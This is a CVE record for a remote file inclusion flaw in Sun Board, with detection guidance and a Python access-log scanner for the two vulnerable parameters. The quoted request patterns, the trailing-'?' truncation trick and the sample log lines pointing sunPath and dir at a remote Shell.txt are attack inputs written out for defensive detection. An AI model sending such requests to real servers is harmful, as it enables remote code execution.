CVE-2007-3370
published 2007-06-22


Priority: P356
CVSS 2.0: 7.5 (high), vector AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 74.53% (99.4th percentile)
Multiple PHP remote file inclusion vulnerabilities in Sun Board 1.00.00 Alpha allow remote attackers to execute arbitrary PHP code via a URL in (1) the sunPath parameter to include.php or (2) the dir parameter to skin/board/default/doctype.php.

Affected (1 range)

Vendor: kim_kyoung_min
Product: sun_board
Version range: not listed
Fixed in: not listed

Detection & IOCs (extracted from sources)

Paths:
  include.php
  skin/board/default/doctype.php
Request patterns quoted in the sources:
  include.php?sunPath=Shell.txt?
  skin/board/default/doctype.php?dir=Shell.txt?
  • Monitor HTTP requests targeting /include.php with a user-supplied `sunPath` parameter containing a remote URL (e.g., http:// or ftp://) — classic RFI pattern used to load a remote shell.
  • Monitor HTTP requests targeting /skin/board/default/doctype.php with a user-supplied `dir` parameter containing a remote URL — second RFI vector in Sun Board 1.00.00 Alpha.
  • The exploit appends a trailing `?` after the remote file URL (e.g., Shell.txt?) so that the PHP extension the application appends becomes part of the remote URL's query string instead of the file name — detect query strings in `sunPath` or `dir` parameters that end with `?` or contain remote URLs.
  • The vulnerable code directly passes the `sunPath` parameter into a `require` statement without sanitization — look for PHP `require`/`require_once` calls using unsanitized GET/POST parameters in Sun Board installations.
  • The RFI vulnerability is only exploitable if PHP's `allow_url_include` (or `allow_url_fopen`) directive is enabled on the target server, which is required for remote file inclusion via `require`/`require_once`.
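The detection bullets above, turned into a small log scanner; this is an added example, not code from the record or from Sun Board. It assumes Apache-style combined access log lines (the sample lines below are constructed, with documentation-range IPs and an assumed /board install prefix) and matches only the two script/parameter pairs named in the advisory, flagging a remote URL scheme or the trailing `?` in the parameter value, including percent-encoded variants.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [22/Jun/2007:10:01:02 +0000] "GET /board/include.php?sunPath=http://203.0.113.9/Shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Jun/2007:10:01:03 +0000] "GET /board/skin/board/default/doctype.php?dir=ftp://203.0.113.9/Shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Jun/2007:10:02:00 +0000] "GET /board/include.php?sunPath=lib/common HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Jun/2007:10:02:05 +0000] "GET /board/index.php?dir=http://example.org/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Jun/2007:10:03:00 +0000] "GET /board/include.php?sunPath=%68ttp://203.0.113.9/Shell.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Vulnerable script -> parameter, as named in the advisory. Matched on path
# suffix because Sun Board may be installed under any prefix (assumption).
RFI_SINKS = {
    "/include.php": "sunPath",
    "/skin/board/default/doctype.php": "dir",
}
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_request(target: str):
    """Return the reasons a request target matches the CVE-2007-3370 pattern ([] if none)."""
    parts = urlsplit(target)
    for suffix, param in RFI_SINKS.items():
        if not parts.path.endswith(suffix):
            continue
        # parse_qs percent-decodes, so %3F at the end is seen as a literal '?'.
        values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
        reasons = []
        for value in values:
            if REMOTE_SCHEME.match(value):
                reasons.append(f"{param} points at a remote URL: {value}")
            if value.endswith("?"):
                reasons.append(f"{param} ends with '?' (extension-truncation trick): {value}")
        return reasons
    return []  # not one of the two vulnerable scripts


def scan_log(text: str):
    """Return (client_ip, request_target, reasons) for every flagged log line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = inspect_request(m.group("target"))
        if reasons:
            hits.append((line.split(" ", 1)[0], m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target)
        for reason in reasons:
            print("   ", reason)
```

Lines 3 and 4 of the sample are deliberately benign (a local include path, and a `dir` parameter on a script the advisory does not name) to show the scanner stays specific to the two affected sinks.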